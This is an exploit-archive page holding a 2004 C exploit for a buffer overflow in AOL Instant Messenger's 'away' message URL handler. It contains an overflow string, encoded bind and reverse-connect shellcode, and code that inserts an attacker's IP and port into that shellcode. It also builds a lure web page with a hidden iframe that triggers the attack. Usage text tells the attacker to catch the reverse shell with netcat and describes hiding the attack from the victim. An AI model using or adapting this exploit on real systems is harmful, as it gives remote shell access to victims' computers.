[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AOL Instant Messenger AIM "Away" Message Remote Exploit
# Published : 2004-09-02
# Author : John Bissell
# Previous Title : Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug)
# Next Title : Citadel/UX <= 6.23 Remote USER Directive Exploit (Private Version)


/* CAN-2004-0636 */

/*
 * AIM Away Message Buffer Overflow Exploit
 *   Exploit by John Bissell A.K.A. HighT1mes
 *
 * Exploit: 
 * ========
 *   drizzit.c
 *
 * Vulnerable Software:
 * ====================
 *    - AIM 5.5.3588
 *    - AIM 5.5.3590 Beta
 *    - AIM 5.5.3591
 *    - AIM 5.5.3595
 *    and a couple others versions...
 *
 * If you want to try other return addressees for other versions of
 * AIM then edit the return address.. But the current one embedded 
 * will work for sure with all the AIM versions listed above.
 *
 * I used some of the metasploit shellcode for this exploit with some
 * modifications to get this into stealth mode so it is harder to 
 * detect the attack. Since I'm using metasploit shellcode that means this
 * exploit can be used on any NT type OS, like win2k, winnt, winxp across
 * any service pack.. I don't know about SP2 though I haven't tested
 * it yet.
 *
 * On a side note I pourposly did not include the download+exec shellcode
 * even though I have it because I'm sick and tired of these little
 * spam/adware bitchs messing peoples computers up for profit.. You can
 * still download/upload through the shell to the victim. It just 
 * isn't automated like download+exec would be.
 *
 * In my opinion the reverse connect (-r option) is the most dangerous
 * because you can encode your ip address and pick a port, and then 
 * when the victim visits the evil web page or email whatever.. then the
 * attack will automatically open his AIM even its not already open and
 * connect to you and then terminate the AIM process to be stealth so
 * the victim doesn't know what him them.. As I remind people in the
 * exploit usage you need to remember to use netcat to listen on a 
 * port you picked for the exploit to connect to...
 *
 * One reason I decided to include the generation of html code for 
 * this exploit is I noticed almost no puts small limits on the 
 * <IFRAME SRC=""> attribute. So when the victim connects to that
 * page or reads that email depending on the browser or client, 
 * The exploit will execute.. IE 6.0 and Mozilla are 
 * affected by this problem as well as Outlook Express when the
 * security settings are set to the Internet Zone.
 *
 * Excuse the sloppy commandline interface I just wanted to get
 * this out to the public. 
 *
 * [ Original advisory posted by Secunia and iDEFENSE. ]
 *
 * Greets:
 * =======
 *   IsolationX, YpCat, DaPhire, route, #romhack,
 *   Taylor Hayes, Aria Giovanni, Anthony Rocha,
 *   InVerse, Deltaflame, Jenna Jameson, iDENFENSE, 
 *   secunia, so1o, John Kerry, and many others...
 *
 * Compiler: 
 * =========
 *    Visual C++ 6.0
 *
 * To compile you first must add ws2_32.lib to the Object/librarys modules:
 * text box under the Project -> Settings menu; then click on the link tab...
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

/* Exploit Data */

char injection_vector[] =

                        "x61x69x6Dx3Ax67x6Fx61x77x61x79x3Fx6Dx65x73x73x61"
                        "x67x65x3Dx41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
                        "x41x41x41x41x41x41x41x41";

char bind_shellcode[] = 

                        "xEBx26x23x38x3Bx41x41"
                        "x92x0fx29x12x41x41x41x41xD9xE1xD9x34x24x58x58x58"
                        "x58x80xE8xE7x31xC9x66x81xE9x97xFEx80x30x92x40xE2"
                        "xFAx7AxAAx92x92x92xD1xDFxD6x92x75xEBx54xEBx77xDB"
                        "x14xDBx36x3FxBCx7Bx36x88xE2x55x4Bx9Bx67x3Fx59x7F"
                        "x6ExA9x1CxDCx9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6C"
                        "x21x84xC5xC1xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6"
                        "x1Bx77x1BxCFx92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2"
                        "x8Ex3Fx19xCAx9Ax79x9Ex1FxC5xBExC3xC0x6Dx42x1Bx51"
                        "xCBx79x82xF8x9AxCCx93x7CxF8x98xCBx19xEFx92x12x6B"
                        "x94xE6x76xC3xC1x6DxA6x1Dx7Ax07x92x92x92xCBx1Bx96"
                        "x1Cx70x79xA3x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92"
                        "x6DxC7xB2xC5xC5xC5xC5xD5xC5xD5xC5x6DxC7x8Ex1Bx51"
                        "xA3x6DxC5xC5xFAx90x92xB0x83x1Bx74xF8x82xC4xC1x6D"
                        "xC7x8AxC5xC1x6DxC7x86xC5xC4xC1x6DxC7x82x1Bx50xF4"
                        "x13x7ExC6x92x1FxAExB6xA3x52xF8x87xCBx61x39x1Bx45"
                        "x54xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxEExB6xDA"
                        "x1BxEExB6xDEx1BxEExB6xC2x1FxD6xB6x82xC6xC2xC3xC3"
                        "xC3xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xA2x1Bx73x79"
                        "x9CxFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xBExC5x6DxC7x9Ex6D"
                        "xC7xBAxC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97"
                        "xEAx93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6"
                        "x19x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9F"
                        "x93x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4"
                        "x19x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3"
                        "x52x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";

char reverse_shellcode[] =
                         
                        "xEBx08x41x41x92x0fx29x12x41x41x41x41xD9xE1xD9x34"
                        "x24x58x58x58x58x80xE8xE7x31xC9x66x81xE9xACxFEx80"
                        "x30x92x40xE2xFAx7AxA2x92x92x92xD1xDFxD6x92x75xEB"
                        "x54xEBx7Ex6Bx38xF2x4Bx9Bx67x3Fx59x7Fx6ExA9x1CxDC"
                        "x9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6Cx21x84xC5xC1"
                        "xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6x1Bx77x1BxCF"
                        "x92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2x8Ex3Fx19xCA"
                        "x9Ax79x9Ex1FxC5xB6xC3xC0x6Dx42x1Bx51xCBx79x82xF8"
                        "x9AxCCx93x7CxF8x9AxCBx19xEFx92x12x6Bx96xE6x76xC3"
                        "xC1x6DxA6x1Dx7Ax1Ax92x92x92xCBx1Bx96x1Cx70x79xA3"
                        "x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92x6DxC7x8AxC5"
                        "xC5xC5xC5xD5xC5xD5xC5x6DxC7x86x1Bx51xA3x6DxFAxDF"
                        "xDFxDFxDFxFAx90x92xB0x83x1Bx73xF8x82xC3xC1x6DxC7"
                        "x82x17x52xE7xDBx1FxAExB6xA3x52xF8x87xCBx61x39x54"
                        "xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxCExB6xDAx1B"
                        "xCExB6xDEx1BxCExB6xC2x1FxD6xB6x82xC6xC2xC3xC3xC3"
                        "xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xBAx1Bx73x79x9C"
                        "xFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xB6xC5x6DxC7x9Ex6DxC7"
                        "xB2xC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97xEA"
                        "x93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6x19"
                        "x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9Fx93"
                        "x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4x19"
                        "x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3x52"
                        "x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";

/* Function Prototypes */

void print_usage(char *prog_name);
unsigned char xor_data(unsigned char byte);

/* Function Code */

int main(int argc, char *argv[])
{
	int i                           = 0;
	int raw_num                     = 0;
	unsigned long port              = 1337; /* default port for bind and reverse attacks
*/
	unsigned long encoded_port      = 0;
	unsigned long encoded_ip        = 0;
	unsigned char print_raw_exploit = 0;
	unsigned char attack_mode       = 2;    /* bind attack by default */
	char ip_addr[256];
	char exploit[2048];
	char str_num[16];
	char *p1, *p2;
	FILE *EXPLOIT_FP;
	char outfile[512];
	WSADATA wsa;




	if (argc < 2) print_usage(argv[0]);

	/* process commandline */
	for (i = 0; i < argc; i++) {
		if (argv[i][0] == '-') {
			switch (argv[i][1]) {
			case 'r':
				/* reverse connect */
				strncpy(ip_addr, argv[i+1], 20);
				attack_mode = 1;
				break;
			case 'b':
				/* bind */
				attack_mode = 2;
				break;
			case 'p':
				port = atoi(argv[i+1]);
				/* port */
				break;
			case 'o':
				print_raw_exploit = 1;
				break;
			case 'e':
				strncpy(outfile, argv[i+1], 256);
			}
		}
	}

  /* initialize the socket library */
  if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
    printf("Error: Winsock didn't initialize!n");
    exit(-1);
  }

	/* build exploit */
	strncpy(exploit, injection_vector, strlen(injection_vector));
	exploit[strlen(injection_vector)+1]=0; // tack on NULL byte
	encoded_port = htonl(port);
	encoded_port += 2;
	if (attack_mode == 1) {
		/* reverse connect attack */
		reverse_shellcode[196] = (char) 0x90;
     	reverse_shellcode[197] = (char) 0x92;
		reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff));
		reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff));

		p1 = strchr(ip_addr, '.');
		strncpy(str_num, ip_addr, p1-ip_addr);
		raw_num = atoi(str_num);
		reverse_shellcode[191] = xor_data((char)raw_num);

		p2 = strchr(p1+1, '.');
		strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1);
		raw_num = atoi(str_num);
		reverse_shellcode[192] = xor_data((char)raw_num);

		p1 = strchr(p2+1, '.');
		strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2);
		raw_num = atoi(str_num);
		reverse_shellcode[193] = xor_data((char)raw_num);

		p2 = strrchr(ip_addr, '.');
		strncpy(str_num, p2+1, 5);
		raw_num = atoi(str_num);
		reverse_shellcode[194] = xor_data((char)raw_num);

		strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
	}
	if (attack_mode == 2) {
		/* bind attack */
		bind_shellcode[204] = (char) 0x90;
     	bind_shellcode[205] = (char) 0x92;
		bind_shellcode[206] = xor_data((char)((encoded_port >> 16) & 0xff));
		bind_shellcode[207] = xor_data((char)((encoded_port >> 24) & 0xff));
		strncat(exploit, bind_shellcode, sizeof(bind_shellcode));
	}

	WSACleanup();

	/* output exploit */
	if (print_raw_exploit == 1) {
		printf("%s", exploit);
	}
	else {
		if ((EXPLOIT_FP = fopen(outfile, "w")) == NULL) {
			fprintf(stderr, "Error: Exploit file can't be created!n");
			exit(-1);
		}

		fprintf(EXPLOIT_FP, "<html>n");
		fprintf(EXPLOIT_FP, "<head>n");
		fprintf(EXPLOIT_FP, "<title>Hey d00d!</title>n");
		fprintf(EXPLOIT_FP, "</head>n");
		fprintf(EXPLOIT_FP, "<body>n");
		fprintf(EXPLOIT_FP, "Some fake web page or email...n");
		fprintf(EXPLOIT_FP, "<iframe width=0 height=0 border=0 src="");
		fprintf(EXPLOIT_FP, "%s", exploit);
		fprintf(EXPLOIT_FP, "">n</iframe>n");
		fprintf(EXPLOIT_FP, "</body>n");
		fprintf(EXPLOIT_FP, "<html>n");

		fclose(EXPLOIT_FP);

		/* im to lazy to make a macro for this banner :P */
		printf(" +-------------------------------------------------+n");
		printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |n");
		printf(" |    AIM Away Message Buffer Overflow Exploit     |n");
		printf(" +-------------------------------------------------+nn");

		printf(" Exploit created!nn");

		printf(" Remember if you use the -r option to have netcat listeningn");
		printf(" on the port you are using for the attack so the victim willn");
		printf(" be able to connect to you when exploited...nn");
		printf(" Example:n");
		printf("tnc.exe -l -p %d", port);
	}

	return(EXIT_SUCCESS);
}

void print_usage(char *prog_name)
{
	printf(" +-------------------------------------------------+n");
	printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |n");
	printf(" |    AIM Away Message Buffer Overflow Exploit     |n");
	printf(" +-------------------------------------------------+nn");
	printf(" Exploit Usage:n");
	printf("t%s -r your_ip | -b [-p port] -o | -e outfilenn", prog_name);
	printf(" Parameters:n");
	printf("t-r your_ip or -bt Choose -r for reverse connect attack modentttt
and choose -b for a bind attack. By defaultntttt if you don't specify -r or
-b then a bindntttt attack will be generated.nn");
	printf("t-p (optional)tt This option will allow you to change the port ntttt
used for a bind or reverse connect attack.ntttt If the attack mode is bind
then  thentttt victim will open the -p port. If the attackntttt mode
is reverse connect  then the port yountttt specify will be the one you want
to listenntttt on so the victim can  connect to yountttt right away.nn");
	printf("t-o or -e outfilett Here you specify the output method...ntttt If
you would like output go straight tontttt standerd output then specify the
-o optionntttt otherwise give the path of where you want tontttt create
the exploit file which is basicallyntttt a simple html file. The -o option
is useful ifntttt you want to test the exploit url inntttt different
ways.nn");
	printf(" Examples:n");
	printf("t%s -r 68.6.47.62 -p 8888 -e c:\exploit.htmln", prog_name);
	printf("t%s -b -p 1542 -e c:\new_exploit.htmln", prog_name);
	printf("t%s -b -on", prog_name);
	printf("t%s -r 68.6.47.62 -onn", prog_name);
	printf(" Remember if you use the -r option to have netcat listeningn");
	printf(" on the port you are using for the attack so the victim willn");
	printf(" be able to connect to you when exploited...nn");
	printf(" Example:n");
	printf("tnc.exe -l -p 8888");
	exit(-1);
}

unsigned char xor_data(unsigned char byte)
{
	return(byte ^ 0x92);
}

// www.Syue.com [2004-09-02]